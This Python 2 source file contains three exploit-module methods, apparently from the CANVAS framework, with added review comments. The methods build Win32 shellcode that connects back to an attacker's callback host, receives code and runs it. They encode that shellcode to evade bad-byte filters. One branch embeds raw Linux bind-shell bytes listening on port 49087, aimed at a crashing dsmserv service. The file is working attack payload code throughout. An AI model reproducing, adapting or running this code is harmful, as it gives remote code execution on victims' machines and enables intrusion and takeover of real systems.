def createShellcode(self):
    """Build, encode and store the callback payload; return it or None.

    Pipeline as written: assemble the stage with ``shellcodeGenerator``,
    nibble-encode it with the uppercase letters 'A'-'Z' treated as bad
    bytes, then XOR-encode that result against ``self.badstring``.  The
    final bytes are stored in ``self.shellcode``; ``None`` is returned if
    they came out empty.

    Reads ``self.subesp``, ``self.callback.ip``/``.port`` and
    ``self.badstring``; writes ``self.shellcode``.  Python 2 code
    (``print`` statements).
    """
    sc=shellcodeGenerator.win32()
    # presumably the generator chains the pieces in the order they are
    # added, so keep this order as-is — generator semantics not visible here
    sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip
    sc.addAttr("revert_to_self_before_importing_ws2_32", None)
    sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip})
    sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
    sc.addAttr("ExitThread",None)
    rawshellcode=sc.get()
    print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)
    #first encode to nibble
    enc = nibble_encoder.intel_nibbleencoder()
    bad = ""
    # NOTE(review): the range is ord('A')..ord('Z'), i.e. uppercase letters
    # only, despite the original "a-z" wording; lowercase bytes are not
    # excluded by this first pass.
    for i in range(ord('A'),ord('Z')+1): #for 'A'-'Z' inclusive, these are badchars
        bad+=chr(i)
    enc.setbadstring(bad)
    rawshellcode = enc.encode(rawshellcode)
    print "[!] Nibble Encoded Shellcode len: %d bytes" % len(rawshellcode)
    #then do a xor enconding using the real badstring
    encoder = xorencoder.simpleXOR()
    encoder.setbadstring(self.badstring)
    # presumably find_key selects a key whose output avoids the bad string;
    # whether it can fail (and how) is not visible here — confirm in xorencoder
    encoder.find_key(rawshellcode)
    self.shellcode = encoder.encode(rawshellcode)
    print "[!] Shellcode len: %d bytes" % len(self.shellcode)
    # An empty result is signalled by returning None rather than raising;
    # callers must check for it.
    if not len(self.shellcode):
        return None
    return self.shellcode
def createShellcode(self):
    """Select and store the payload for the configured target; return it.

    Branches on the target label in ``targets[self.version][0]`` (the
    ``targets`` table is module-level and not visible here): a "linux"
    target gets a fixed, hard-coded byte string; a "windows" target runs
    ``createSmallWin32Shellcode`` and nibble-encodes the result against
    ``self.badstring``.  Any other label leaves ``self.shellcode`` as it
    was — if nothing set it earlier, the final ``return`` raises
    ``AttributeError``.  Python 2 code.
    """
    if targets[self.version][0].lower().find("linux") > -1:
        # Shellcode bind port 49087
        #
        # 1/ can't use a callback shellcode because dsmserv dies after the
        # exploitation. so the connection is broken.
        #
        # 2/ the solution is to use a multi shellcode but I'm not yet at
        # ease with API CANVAS
        #
        # TODO: MOSDEF
        #
        # Opaque, hard-coded bytes; nothing below is applied to them (no
        # bad-byte encoding on this branch).
        self.shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
    elif targets[self.version][0].lower().find("windows") > -1:
        try:
            # presumably createSmallWin32Shellcode stores its result in
            # self.shellcode — the encode() call below reads it
            self.createSmallWin32Shellcode(self.callback.ip, self.callback.port, subesp=3000)
            encoder = nibble_encoder.intel_nibbleencoder()
            encoder.setbadstring(self.badstring)
            self.shellcode = encoder.encode(self.shellcode)
        except:
            # NOTE(review): bare except catches everything — including
            # programming errors, encoder failures and KeyboardInterrupt —
            # and silently substitutes a 256-byte 0xcc (int3) filler.
            # Narrowing it to the failure the log message refers to
            # (callback not configured) would stop real bugs from being
            # masked.
            self.log( "[!] did you forget to set -l -d on the commandline !?")
            self.shellcode = "\xcc" * 256
    #print "[!] shellcode length is %d bytes"% len(self.shellcode)
    return self.shellcode
def createShellcode(self):
    """Build the Win32 callback payload, nibble-encode it and return it.

    Delegates assembly to ``createWin32Shellcode`` (first argument passed
    as an empty string; its meaning is not visible here), then replaces
    the stored value with its nibble-encoded form using ``self.badstring``
    as the bad-byte set.  Reads ``self.callback.ip``/``.port`` and
    ``self.badstring``; writes ``self.shellcode``.
    """
    host = self.callback.ip
    port = self.callback.port
    # presumably createWin32Shellcode stores its output in self.shellcode —
    # the encode() call below reads it; confirm against the base class
    self.createWin32Shellcode("", host, port)
    encoder = nibble_encoder.intel_nibbleencoder()
    encoder.setbadstring(self.badstring)
    self.shellcode = encoder.encode(self.shellcode)
    return self.shellcode